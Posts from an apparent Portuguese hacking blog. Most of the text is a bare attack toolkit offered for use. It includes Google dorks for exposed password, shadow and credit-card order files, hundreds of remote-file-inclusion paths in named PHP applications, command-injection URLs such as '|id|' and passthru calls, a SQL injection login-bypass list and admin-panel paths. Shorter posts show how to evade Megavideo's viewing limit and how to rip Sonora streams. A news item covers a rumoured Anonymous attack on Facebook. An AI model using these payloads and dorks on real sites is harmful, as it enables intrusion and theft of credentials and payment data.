Mr. Drawer

Como Assistir Megavideo Ilimitado

2011-12-03T13:25:00.001-02:00

Quando acabar seu tempo de vídeo

Execute o Prompt do DOS em modo adminstrador (click com o botão direito em cima do ícone)

Quando a tela do DOS aparecer: escreva "ipconfig /release" e em seguida escreva "ipconfig /renew" (zerando e renovando o seu IP)

Espere uns 3 minutos e você terá renovará seu tempo.

Faça quantas vezes quiser!

Falha de Segurança no código fonte permite download das músicas do SONORA

2011-11-15T08:59:00.001-02:00

Falagalera... Sonora na área!

Vou apontaruma possível falha logicamente no código fonte do sonora.terra.com.br. Nadamais nada menos do que está no código fonte para que você possa baixar suamúsica preferida do SONORA.

Particularmenteeu prefiro baixar músicas com outros métodos, mais simples e eficazes do queficar gravando um “streaming”.

O que vamos precisar:

Google Chrome – Versão 15.0.874.120

SoundTapStreamin Audio Recorder – NCH Software

Vamos lá,

Abra a página do Sonora: http://sonora.terra.com.br/

Click emcima do seu artista ou procure ele no site. Nomeu caso, “Faith No More” – The Very Best Definitive.

Irá abrir uma próxima tela:

Click no Álbum "The Very Best Definitive"

Irá abrir um próxima tela, selecione uma música e click em OUVIR.

Mais uma tela se abrirá no canto inferior do seu browser

No Google Chorme com o botão direito click em cima do play e vá em Inspecionar elemento (ótima ferramenta!)

Procure com a barra de rolagem PlayerSonoraObject - Lá estará o arquivo que você está ouvindo no player do sonora.

No meu caso é mms://stream-sonora01.terra.com/sonorad/00/06/44/6442612.wma

Com esta informação do código abra o SoundTap e click em SoundTap -> Launcher URL... Copie o link acima mms://stream-sonora01.terra.com/sonorad/00/06/44/6442612.wma só que coloque http:// em vez de mms:// ficando assim:

http://stream-sonora01.terra.com/sonorad/00/06/44/6442612.wma

Precione OK (Irá abrir uma nova aba no navegador Chrome)

Simultaneamente click em Start Recording para gravar a música.

Pronto, quando terminar a música pare de gravar no SoundTap.

Esse método é um de muitos que testei. Ele é ótimo para alguma música específica que você goste e tem a vantagem de não precisar baixar o álbum inteiro.

No SoundTap ainda tem a opção na aba OPTOINS de salvar em .mp3

Bom divertimento!

Ataque hacker ao Facebook pode ocorrer no sábado

2011-11-04T17:48:00.000-02:00

O fim está próximo, mas não será em dezembro, nem em 2012, como previram os maias. O fim dele, o Facebook, poderá ser – pelo menos por um dia – sábado. Mas calma: assim como a previsão do fim dos tempos, nada está confirmado. A dúvida do boato, porém, incomoda. Para muita gente, a visita ao livro virtual de rostos e posts já virou hábito. O possível ataque hacker que comprometeria o Facebook viria do grupo de hacking internacional Anonymous, com a motivação de chamar a atenção do endereço para a sua política de privacidade.

A ameaça surgiu em 10 de agosto e a ideia do grupo era, como os próprios integrantes disseram, alertar e forçar o Facebook a rever a “ausência de escolha em relação à privacidade” no site. Além disso, o Anonymous pretendia se manifestar contra a suposta política de venda de informações sigilosas dos usuários da rede a governos mundiais. Naquele mesmo dia, a possível ofensiva foi confirmada no perfil oficial do grupo no Twitter (@AnonOps), mas com ressalvas. Segundo o post, a invasão estava sendo organizada por alguns integrantes do grupo, o que não representava necessariamente a opinião de todos os Anonymous.

Se vai ocorrer ou não, é difícil prever. O Informátic@ tentou entrar em contato com o grupo, que mantém diversos perfis em cidades brasileiras, incluindo Belo Horizonte (@anonymousbh), mas não obteve resposta. Como o grupo não tem um porta-voz e como nenhum dos integrantes, por acordo firmado por eles, não tem liberdade para falar em nome do grupo, se torna complicada a tentativa de conversar e, portanto, entender quais são as reais chances de um ataque à rede.

De toda forma, comentários na internet dão conta de que os integrantes do grupo geralmente são avisados com pouca antecedência sobre invasões e ofensivas contra serviços ou sites, o que atrapalharia na preparação dos servidores por parte de quem é atacado. Nesse caso, em específico, o Facebook estaria avisado já há três meses, com data marcada, inclusive. Procurada, a assessoria da rede social, em São Paulo, explicou que o Facebook não fará nenhum comentário acerca da declaração do grupo Anonymous. (Com Anderson Rocha)

Quem são eles?
O grupo Anonymous fez fama depois de invadir sites do governo, ter acesso a dados e informações sigilosas e divulgá-los. Outro feito foi a invasão aos sites de cartão de crédito que proibiram doações ao WikiLeaks. Os Anonymous são ativistas que se organizam por meio de uma comunidade on-line e descentralizada, de maneira coordenada, geralmente em torno de um objetivo combinado entre si. A ideia do grupo é promover ataques via internet como forma de protesto.

Feche as janelas, tranque as portas
O Facebook não chegou aonde chegou por acaso. O sistema deles não se abala por qualquer coisa e, ao contrário do (também muito interessante) Twitter, que fica “baleiando” por aí, a rede de Zuckerberg se segura bem. Mas vai que... né? Prevenir é melhor que remediar. Então, há alguma coisa que os usuários do site devem fazer no dia 5? Não entrar no Facebook, tirar dados pessoais?

Rafael Nunes, professor de redes de computadores e coordenador do curso de ciências da computação da Universidade Fumec, explica que as pessoas devem retirar dados como endereço, telefone e números de cartão de crédito, além de não utilizar serviços de check-in, por exemplo. “No dia específico, a pessoa deve desabilitar certas funções no Facebook que avisam onde ela está e o que está fazendo, por exemplo”, explica. Segundo ele, as pessoas devem evitar também postar o que pretendem fazer nesse dia, como sair para uma balada, pois não é possível prever quais podem ser as finalidades de um ataque virtual. Rafael não acredita que o Anonymous vá roubar dados dos usuários e sim, caso ocorra o ataque, sobrecarregar o serviço, de forma que as pessoas não consigam fazer login no site. Mesmo assim, melhor seguir as orientações, não é?

Boa Sorte!

2010-09-23T13:10:00.003-03:00

inurl:usuarios.mdb
inurl:users.mdb
inurl:site.ini
inurlassword.mdb
inurlrders.log
inurl:shopping.mdb
inurl:cart/cart.asp
inurl:/productcart
inurl:vti_inf.html
inurl:service.pwd
inurl:users.pwd
inurl:authors.pwd
inurl:administrators.pwd
inurl:shtml.dll
inurl:shtml.exe
inurl:fpcount.exe
inurl:default.asp
inurl:showcode.asp
inurl:sendmail.cfm
inurl:getFile.cfm
inurl:imagemap.exe
inurl:test.bat
inurl:msadcs.dll
inurl:htimage.exe
inurl:counter.exe
inurl:browser.inc
inurl:hello.bat
inurlasswd filetype:txt
inurl:admin filetype:db
inurl:iisadmin
inurl:"auth_user_file.txt"
inurl:"Admin_files"
inurl:"wwwroot/*."allinurl:/i-shoppro
shodbtest.asp
allinurl: comersus_viewitem.asp
allinurl:mdbinurl:usuarios.mdb
inurl:users.mdb
inurl:site.ini
inurlassword.mdb
inurlrders.log/cgi-bin/i-shop/admin/store.log
/cgi-bin/i-shoppro/admin/store.log/cgi-bin/DCShop/Orders/orders.txt
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/cgi-bin/store/Admin_files/myorderlog.txt
/cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
/cgibin/shop/orders/orders.txt
/cgibin/DCShop/auth_data/auth_user_file.txt
/htbin/orders/orders.txt
/PDG/order.txt
/orders/import.txt
/htbin/DCShop/auth_data/auth_user_file.txt
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=my order.txt
/cgi-bin/DCShop/auth_data/auth_user_file.txt
/bin/shop/auth_data/auth_user_file.txt
/cgi-local/orders/orders.txt
/cgi-bin/PDG_Cart/mc.txt
/cgi-bin/cart32/CART32-order.txt
/cgi-bin/orders/cc.txt
/cgis/shop/orders/orders.txt
/Admin_files/ccelog.txt
/scripts/DCShop/auth_data/auth_user_file.txt
/WebShop/templates/cc.txtinurl:shopping.mdb
inurl:cart/cart.asp
inurl:/productcart
inurl:vti_inf.html
inurl:service.pwd
inurl:users.pwd
inurl:authors.pwd
inurl:administrators.pwd
inurl:shtml.dll
inurl:shtml.exe
inurl:fpcount.exe
inurl:default.asp
inurl:showcode.asp
inurl:sendmail.cfm
inurl:getFile.cfm
inurl:imagemap.exe
inurl:test.bat
inurl:msadcs.dll
inurl:htimage.exe
inurl:counter.exe
inurl:browser.inc
inurl:hello.bat"Index of /admin"
"Index of /password"
"Index of /mail"
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailtoadministrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax indexallinurl: comersus_viewitem.asp
allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:govinurlasswd filetype:txt
inurl:admin filetype:db
inurl:iisadmin
inurl:"auth_user_file.txt"
inurl:"Admin_files"
inurl:"wwwroot/*."top secret site:mil
confidential site:milallinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_historyintitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart

/auktion.pl?menue=|id|
/auktion/cgi-bin/auktion.pl?menue=|id|
/auktion/auktion.pl?menue=|id|
/cgi/auktion.pl?menue=|id|

Index of /passwd
Index of /password
Index of /mail"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess"Index of /secret"
"Index of /confidential"
"Index of /root"
"Index of /cgi-bin"
"Index of /credit-card"
"Index of /logs"
"Index of /config"inurl:admin filetype:txt
inurl:admin filetype:db
inurl:admin filetype:cfg
inurl:mysql filetype:cfg
inurlasswd filetype:txt
inurl:iisadmin
inurl:auth_user_file.txt
inurlrders.txt
inurl:"wwwroot/*."
inurl:adpassword.txt
inurl:webeditor.php
inurl:file_upload.phpinurl:gov filetype:xls "restricted"
index of ftp +.mdb allinurl:/cgi-bin/ +mailtointitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cartallintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:govallinurl:/scripts/cart32.exe
allinurl:/CuteNews/show_archives.php
allinurl:/phpinfo.phpallinurl:/privmsg.php
allinurl:/privmsg.php

/subcat.html?subcat=
/gallery/thumstbl.php?lang=
/photoalbum/thumstbl.php?lang=
/photoalbum/wpfiles.php?lang=
/photoalbum/wallpapr.php?lang=
/phpopenchat/contrib/yabbse/poc.php?sourcedir=
/calendar/calendar.php?serverPath=
/calendar/functions/popup.php?serverPath=
/calendar/events/header.inc.php?serverPath=
/calendar/events/datePicker.php?serverPath=
/welcome.php?custom_welcome_page=
/connectedNodes.ovpl?node=
/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
/zentrack/index.php?configFile=
/pivot/modules/module_db.php?pivot_path=
/inc/header.php/step_one.php?server_inc=
/install/index.php?lng=../../include/main.inc&G_PATH=
/inc/pipe.php?HCL_path=
/include/write.php?dir=
/include/new-visitor.inc.php?lvc_include_dir=
/includes/header.php?systempath=
/support/mailling/maillist/inc/initdb.php?absolute_path=
/coppercop/theme.php?THEME_DIR=
/becommunity/community/index.php?pageurl=
/shoutbox/expanded.php?conf=
/agendax/addevent.inc.php?agendax_path=
/myPHPCalendar/admin.php?cal_dir=
/yabbse/Sources/Packages.php?sourcedir=
/zboard/zboard.php=
/path_of_cpcommerce/_functions.php?prefix=
/dotproject/modules/projects/addedit.php?root_dir=
/dotproject/modules/projects/view.php?root_dir=
/dotproject/modules/projects/vw_files.php?root_dir=
/dotproject/modules/tasks/addedit.php?root_dir=
/dotproject/modules/tasks/viewgantt.php?root_dir=
/My_eGallery/public/displayCategory.php?basepath=
/modules/My_eGallery/public/displayCategory.php?basepath=
/modules/4nAlbum/public/displayCategory.php?basepath=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/agendax/addevent.inc.php?agendax_path=
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/library/editor/editor.php?root=
/library/lib.php?root=
/e107/e107_handlers/secure_img_render.php?p=
/inc/step_one_tables.php?server_inc=
/GradeMap/index.php?page=
/phpshop/index.php?base_dir=
/admin.php?cal_dir=
/contacts.php?cal_dir=
/convert-date.php?cal_dir=
/album_portal.php?phpbb_root_path=
/mainfile.php?MAIN_PATH=
/dotproject/modules/files/index_table.php?root_dir=
/html/affich.php?base=
/gallery/init.php?HTTP_POST_VARS=
/pm/lib.inc.php?pm_path=
/ideabox/include.php?gorumDir=

/index.php?p=
/index.php?pagina=
/index.php?page=
/index.php?index=
/index.php?home=
/default.php?page=
/default.php?index=
/default.php?home=
/astm_tech.php?lang=
/foto.php?c1=
/index.php?leng=
/index.php?page=
/index.php?rev=
/index.php?main=
/index.php?show=
/index.php?x=
/index.php?inc=
/index.php?menu=
/index.php?aktie=
/index.php?s=
/index.php?p=
/index.php?principal=
/index.php?url=
/index.php?file=
/index.php?do=
/index.php?side=
/index.php?f=
/index.php?display=
/index.php?webpage=
/index.php?content=
/index.php?source=
/index.php?texto=
/index.php?go=
/index.php?contents=
/index.php?meio=
/index.php?miolo=
/index.php?section=
/index.php?configFile=
/index.php?op=
/index.php?id=
/index.php?corpo=
/index.php?article=
/index.php?Itemid=
/index.php?product_id=
/index.php?lang=
/index.php?showtopic=
/index.php?option=
/index.php?link=
/index.php?module=
/index.php?submenu=
/index.php?cat=
/index.php?visualizar=
/index.php?open=
/index.php?include=
/blank.php?path=
/site.php?content=
/impresion.php?f1=
/topicos.php?area=
/main.php?page=
/main.php?file=
/main.php?ver=
/main.php?dir=
/main.php?side=
/main.php?doc=
/main.php?x=
/main.php?lk=
/main.php?pbody=
/main.php?menu=
/main.php?op=
/index2.php?secao=
/index2.php?center=
/index2.php?content=
/index2.php?area=
/index2.php?link=
/index2.php?id=
/index2.php?fight=
/index2.php?music=
/index2.php?record=
/index2.php?p=
/index2.php?home=
/index2.php?site=
/index2.php?radio=
/site.php?Tipo=
/site.php?nav=
/site.php?comsocial=
/site.php?pagina=
/site.php?opcao=
/site.php?page=
/site.php?menu=
/site.php?area=
/admin/calendar=
/tools/send_reminders.php?includedir=
/sources/join.php FORM[url]=owned&&CONFIG[captcha]=1&&CONFIG[path]=
/index.php?module=PostWrap&page=
/oneadmin/config.php?path[docroot]=
/b2-tools/gm-2-b2.php?b2inc=
/maillist/admin.php=
/db.php?path_local=
/services.php?page=
/template.php?pagina=
/htmltonuke.php?filnavn=
/GradeMap/index.php?page=
/html/affich.php?base=
/header.php?admin_root=
/eventcal2.php?path_simpnews=
/eventscroller.php?path_simpnews=
/gbpro/top.php?header=
/fusion/templates/headline_temp.php?nst_inc=
/expanded.php?conf=
/include/main.php?config[search_disp]=true&include_dir=
/bbs/include/write.php?dir=
/zpanel/zpanel.php?page=
/votebox.php?VoteBoxPath=
/admin_styles.php?phpbb_root_path=
/getpage.php?page=/getpage.php?page=
/lib/static/header.php?set_menu=
/calendar/setup/setupSQL.php?serverPath=
/calendar/setup/header.inc.php?serverPath=
/calogic/cl_minical.php?CLPATH=
/calogic/clmcpreload.php?CLPATH=
/calogic/mcconfig.php?CLPATH=
/calogic/mcpi-demo.php?CLPATH=
/admin_modules/admin_module_captions.inc.php?config[path_src_include]=
/admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=
/admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=
/admin_modules/admin_module_edit.inc.php?config[path_src_include]=
/admin_modules/admin_module_delimage.inc.php?config[path_src_include]=
/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=
/src/index_overview.inc.php?config[path_src_include]=
/src/image-gd.class.php?config[path_src_include]=
/src/image.class.php?config[path_src_include]=
/src/album.class.php?config[path_src_include]=
/src/show_random.inc.php?config[path_src_include]=
/src/main.inc.php?config[path_src_include]=
/src/index_passwd-admin.inc.php?admin_ok=1&config[path_admin_include]=
/xcomic/initialize.php?xcomicRootPath=
/xcomic/Xcomic.php?xcomicRootPath=
/xcomic/admin/admininitialize.php?xcomicRootPath=
/[path_to_squito]/photolist.inc.php?photoroot=
/[path-to-spid]/lang/lang.php?lang_path=
/inc/functions.inc.php?config[ppa_root_path]=
/phpSecurePages/secure.php?&cfgProgDir=
/ops/gals.php?news_file=
/gb/form.inc.php3?lang=
/nabopoll/survey.inc.php?path=
/ovidentia/index.php?babInstallPath=
/user_check.php?sitepath=
/last_gallery.php?YAPIG_PATH=
/download/downloads.php?release_id=650&incdir=
/popper/childwindow.inc. php?form=
/clmcpreload.php?CLPATH=
/modernbill/samples/news.php?DIR=
/xtcommerce/admin/includes/classes/spaw/spaw_control.class.php?spaw_root=
/classes/adodbt/sql.php?classes_dir=
/vwar/admin/admin.php?vwar_root=
/simplog/doc/index.php?cmd=
/includes/kb_constants.php?module_root_path=
/iuser/common.php?include_path=
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
/about.php?bd=
/phplivehelper/initiate.php?abs_path=
/ashnews.php?pathtoashnews=
/forum/Bugs/class.mysql.php?path_to_bt_dir=
/ihm.php?p=
/cgi-bin/quikstore.cgi?category=|id|
/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=|una me -a|
/cgi-sys/guestbook.cgi?user=cpanel&template=|id|
/events.cgi?t=|id|
/powerup.cgi?a=latest&t=|id|
/lc.cgi?a=|id|
/news.cgi?a=114&t=|id|
/biznews.cgi?a=33&t=|id|
/jobs.cgi?a=9&t=|id|
/articles.cgi?a=34&t=|id|
/events.cgi?a=155&t=|id|
/latinbitz.cgi?t=|id|
/newsdesk.cgi?t=|id|
/media.cgi?a=11&t=|id|
/reporter.cgi?t=|id|
/news.cgi?t=|id|
/newsupdate.cgi?a=latest&t=|uname%20-a|
/deportes.cgi?a=latest&t=|id|
/news.cgi?a=latest&t=|uname%20-a|
/whereami.cgi?g=id
/auktion.pl?menue=|id|
/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=|una me -a|
/cgi-sys/guestbook.cgi?user=cpanel&template=|id|
/events.cgi?t=|id|
/powerup.cgi?a=latest&t=|id|
/lc.cgi?a=|id|
/news.cgi?a=114&t=|id|
/biznews.cgi?a=33&t=|id|
/jobs.cgi?a=9&t=|id|
/articles.cgi?a=34&t=|id|
/events.cgi?a=155&t=|id|
/latinbitz.cgi?t=|id|
/newsdesk.cgi?t=|id|
/media.cgi?a=11&t=|id|
/reporter.cgi?t=|id|
/news.cgi?t=|id|
/newsupdate.cgi?a=latest&t=|uname%20-a|
/deportes.cgi?a=latest&t=|id|
/news.cgi?a=latest&t=|uname%20-a|
/whereami.cgi?g=id
/dotproject/modules/projects/addedit.php?root_dir=
/dotproject/modules/projects/view.php?root_dir=
/dotproject/modules/projects/vw_files.php?root_dir=
/dotproject/modules/tasks/addedit.php?root_dir=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/demo/includes/init.php?user_inc=
/jaf/index.php?show=
/inc/shows.inc.php?cutepath=
/poll/admin/common.inc.php?base_path=
/pollvote/pollvote.php?pollname=
/sources/post.php?fil_config=
/modules/My_eGallery/public/displayCategory.php?basepath=
/bb_lib/checkdb.inc.php?libpach=
/include/livre_include.php?no_connect=lol&chem_absolu=
/index.php?from_market=Y&pageurl=
/pivot/modules/module_db.php?pivot_path=
/modules/4nAlbum/public/displayCategory.php?basepath=
/derniers_commentaires.php?rep=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
/coppermine/themes/maze/theme.php?THEME_DIR=
/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
/myPHPCalendar/admin.php?cal_dir=
/agendax/addevent.inc.php?agendax_path=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/horde/services/help/?show=about&module=;%22.passthru(%22id%22);
/alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=
/maillist/admin.php
/zboard/zboard.php
/path_of_cpcommerce/_functions.php?prefix
/modules/Forums/admin/admin_styles.php?phpbb_root_path=
/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=
index.php?site=
index.php?url=
index.php?p=
index.php?openfile=
index.php?file=
index.php?go=
index.php?seite=
index.php?content=
index.php?side=
index.php?kobr=
index.php?pg=
index.php?doc=
index.php?l=
index.php?a=
index.php?pagina=
index.php?principal=
index.php?show=
index.php?opcao=
index.php?conteudo=
index.php?meio=
index.php?inc=
index.php?c=
index.php?rage=
index.php?arquivo=
principal.php?conteudo=
principal.php?arquivo=
principal.php?pagina=
principal.php?pg=
main.php?site=
template.php?pagina=
contenido.php?sec=
index_principal.php?pagina=
template.php?name=
forum.php?act=
home.php?action=
home.php?pagina=
noticias.php?arq=
main.php?x=
main.php?page=
default.php?page=
index.php?cont=
index.php?configFile=
index.php?meio.php=
index.php?include=
index.php?x=
index.php?open=
index.php?visualizar=
index.php?page=
index.php?pag=
index.php?cat=
index.php?action=
index.php?do=
index2.php?x=
index2.php?content=
main.php?pagina=
index.phpmain.php?x=
index.php?link=
index.php?canal=
index.php?screen=
index.php?langc=
services.php?page=
htmltonuke.php?filnavn+

Lista de SQL injection
shell
root
admin
hi ' ou 1=1 --
hi ' ou ' a'='a
hi ') ou (' a'='a
hi") ou ("a"="a
admin ' - -
' ou 0=0 --
"ou 0=0 --
ou 0=0 --
' or ' 1
b' or ' 1='
' or '1
' or '|
' or 'a'='a
' or ''='
' or 1=1--
') or ('a'='a
' or '1'='1
' ou 0=0 #
"ou 0=0 #
ou 0=0 #
' ou ' x'='x
"ou" x"="x
') ou (' x'='x
"ou" a"="a
') ou (' a'='a
") ou ("a"="a
hi "ou" a"="a
hi "ou 1=1 --
' ou 1=1 --
"ou 1=1 --
ou 1=1 --
' ou a=a --
' ou 1=1 --
"ou 1=1 --
ou 1=1 --
' ou a=a --
/area_restrita/admin.asp
/area_restrita/login.asp
/area_restrita/index.asp
/acesso/admin.asp
/adm/default.asp
/login/index.asp
/webmaster/login.asp
/webadmin/default.asp
/webadmin/index.asp
allinurl:admin/index.asp
allinurl:admin/default.asp
allinurl:admin/admin.asp
allinurl:admin/login.asp
/cadastro/admin/
/portal/admin/
/site/admin/
/home/admin.asp
/home/admin/index.asp
/home/admin/default.asp
/menu/admin/admin.asp
/painel/admin/admin.asp
/painel/admin/login.asp
/painel/admin/index.asp
/painel/admin/default.asp
/site/admin/default.asp
/site/admin/index.asp
/site/admin/login.asp
/home/adm/login.asp
/home/adm/senha.asp
/home/adm/index.asp
/home/adm/defaul.asp
/menu/admin/index.asp
/shop/admin/login.asp
/ecommerce/admin/index.asp
/ecommerce/admin/default.asp
/ecommerce/admin/login.asp
/pedidos/admin/default.asp
/pedidos/admin/index.asp
/pedidos/admin/login.asp
/asp/admin/login.asp
/asp/admin/index.asp
/asp/admin/default.asp
/shop/admin/default.asp
/shop/admin/index.asp
/admin/entrar.asp
/admin/default.asp
/admin/index.asp
/admin/login.asp
/admin/password.asp
/admin/senha.asp
/login/login.asp
/adm/index.asp
/store/admin/index.asp
/stroe/admin/login.asp
/images/admin/
/client/admin.asp
/order/admmin.asp
/order/admin/index.asp
/order/admin/login.asp
/order/admin/default.asp
/admin/senha.asp
/webadmin/default.asp
/menu_admin/default.asp
/menu_admin/index.asp
/menu_admin/login.asp
/noticias/admin/
/news/admin/
/home/admin/login.asp
/web/admin/index.asp
/web/admin/default.asp
/web/admin/login.asp
/menu/admin/default.asp
/menu/admin/login.asp
/acesso/admin/default.asp
/acesso/admin/index.asp
/post/admin/default.asp
/post/admin/
/post/admin/index.asp
/post/admin/login.asp
/eshop/admin/
/eshop/admin.asp
/eshop/admin/default.asp
/eshop/admin/index.asp
/comercio/admin.asp
/comercio/admin/default.asp
/comercio/admin/index.asp
/compras/admin/
/clientes/admin/
/busines/admin/
/news/admin/login.asp
/news/admin/default.asp
/news/admin/index.asp
/imprensa/login.asp
/imprensa/admin.asp
/imprensa/admin/default.asp
/banner/admin/
/banner/admin/default.asp
/banner/admin/index.asp
/newsleter/admin.asp
/newsleter/admin/default.asp
/newsleter/admin/index.asp
/principal/admin.asp
/principal/admin/default.asp
/principal/admin/index.asp
/principal/admin/login.asp
/editar/admin.asp
/editar/admin/login.asp
/editar/admin/index.asp
/editar/admin/default.asp
/form/admin.asp
/admin/admin.asp
/admin/index.asp
/admin/admin/default.asp
/edit/admin/index.asp
/edit/admin/default.asp
/menu/admin/senha.asp
/painel/admin/senha.asp
/admin/admin/adm.asp
/admin/adm/senha.asp
/adm/admin/login.asp
/adm/admin/default.asp
/admin/loja/senha.asp
/admin/lojas/default.asp
/admin/lojas/index.asp
/loja/admin.asp
/db/admin/index.asp
/db/admin/login.asp
/menu_admin/senha.asp
/pedidos/admin/senha.asp
/principal/admin/senha.asp
/home/admin/senha.asp
/news/admin/senha.asp
/noticias/admin/senha.asp
/portal/admin/senha.asp
/site/admin/senha.asp
/db/admin/default.asp
/db/admin/senha.asp
/host/admin/default.asp
/host/admin/index.asp
/host/admin/login.asp
/login/admin.asp
/login_admin/index.asp
/login_admin/default.asp
/login_admin/login.asp
/store/admin.asp
/store/admin/default.asp
/imprensa/admin/index.asp
/imprensa/admin/login.asp
/banners/admin.asp
/banners/admin/default.asp
/banners/admin/index.asp
/banners/admin/login.asp
/strore/admin/senha.asp
/controle/admin.asp
/controle/admin/index.asp
/controle/admin/default.asp
/controle/admin/login.asp
/parceiros/admin.asp
/parceiros/admin/login.asp
/parceiros/admin/default.asp
/parceiros/admin/index.asp
/administrador/login.asp
/webmaster/login.asp
/webmaster/senha.asp
/webmaster/autenticar.asp
/admin/autenticar.asp
/admin/logout.asp
/admin/logar.asp
/webmaster/logar.asp
/store/admin/logar.asp
/shopping/admin.asp
/shopping/admin/login.asp
/shopping/admin/index.asp
/shopping/admin/default.asp
/admin/menu.asp
/admin/painel.asp
/shop/admin/logar.asp
/admin/acesso.asp
/restrito/admin.asp
/restrito/acesso/admin.asp
/restrito/adm/login.asp
/webmaster/entrar.asp
/admin/site/entrar.asp

default.php?page= inurl:"default.php?page="
folder.php?id= inurl:"folder.php?id="
index.php?Load= inurl:"index.php?Load="
index.php?Language= inurl:"index.php?Language="
hall.php?file= inurl:"hall.php?file="
hall.php?page= inurl:"hall.php?page="
template.php?goto= inurl:"template.php?goto="
video.php?content= inurl:"video.php?content="
pages.php?page= inurl:"pages.php?page="
print.php?page= inurl:"print.php?page="
show.php?page= inurl:"show.php?page="
view.php?page= inurl:"view.php?page="
media.php?page= inurl:"media.php?page="
index1.php?choix= inurl:"index1.php?choix="
index1.php?menu= inurl:"index1.php?menu"
index.php?ort= inurl:"index.php?ort="
index2.php?showpage= inurl:"index2.php?showpage="
index2.php?ascii_seite= inurl:"index2.php?ascii_seite="
index2.php?DoAction= inurl:"index2.php?DoAction="
index.php?canal= inurl:"index.php?canal="
index.php?screen= inurl:"index.php?screen="
index.php?langc= inurl:"index.php?langc="
services.php?page= inurl:"services.php?page="
htmltonuke.php?filnavn= inurl:"htmltonuke.php?filnavn="
ihm.php?p= inurl:"ihm.php?p="
default.php?page= inurl:"default.php?page="
folder.php?id= inurl:"folder.php?id="
index.php?Load= inurl:"index.php?Load="
index.php?Language= inurl:"index.php?Language="
hall.php?file= inurl:"hall.php?file="
hall.php?page= inurl:"hall.php?page="
template.php?goto= inurl:"template.php?goto="
video.php?content= inurl:"video.php?content="
pages.php?page= inurl:"pages.php?page="
print.php?page= inurl:"print.php?page="
show.php?page= inurl:"show.php?page="
view.php?page= inurl:"view.php?page="

/surveys/survey.inc.php?path= inurl:surveys
index.php?body= inurl:"index.php?body="
/classes/adodbt/sql.php?classes_dir= allinurl:adobt sitel
enc/content.php?Home_Path= "powered by doodle cart"
/classified_right.php?language_dir= inurl:classified.php phpbazar
/sources/functions.php?CONFIG[main_path]= "(Powered By ScozNews)"
/sources/template.php?CONFIG[main_path]= "(Powered By ScozNews)"
/embed/day.php?path= intitle:"Login to Calendar"
/includes/dbal.php?eqdkp_root_path= "powered by EQdkp"
/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= "Powered By Aardvark Topsites PHP 4.2.2"
/includes/kb_constants.php?module_root_path= "Powered by Knowledge Base"
/mcf.php?content= allinurl:"mcf.php" site:.de
/components/com_facileforms/facileforms.frame.php?ff_compath= allinurl:"com_facileforms" site:.ar
skins/advanced/advanced1.php?pluginpath[0]= "Sabdrimer CMS"
/zipndownload.php?PP_PATH= "Powered by: PhotoPost PHP 4.6"
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path= inurl:"com_serverstat"
/components/com_zoom/includes/database.php?mosConfig_absolute_path= inurl:"index.php?option="com_zoom"
/main.php?sayfa= inurl:"main.php?sayfa="
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath= allinurl:com_extended_registration
/addpost_newpoll.php?addpoll=preview&thispath= allinurl:"/ubbthreads/"
/header.php?abspath= "MobilePublisherPHP"
components/com_performs/performs.php?mosConfig_absolute_path= inurl:"com_performs"
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:index.php?option=com_remository
impex/ImpExData.php?systempath= intextowered by vbulletin
/modules/vwar/admin/admin.php?vwar_root= allinurl:vwar site:.com
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= "powered by phpCOIN 1.2.3"
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:.com/index.php?option=com_remository
/tools/send_reminders.php?includedir= allinurl:day.php?date=
/skin/zero_vote/error.php?dir= skin/zero_vote/error.php
/modules/TotalCalendar/about.php?inc_dir= allinurl:/TotalCalendar
/login.php?dir= allinurl:login.php?dir=
/tags.php?BBCodeFile= intitle:"Tagger LE" inurl:tags.php
index.php?pageurl= inurl:"index.php?pageurl=*.php"
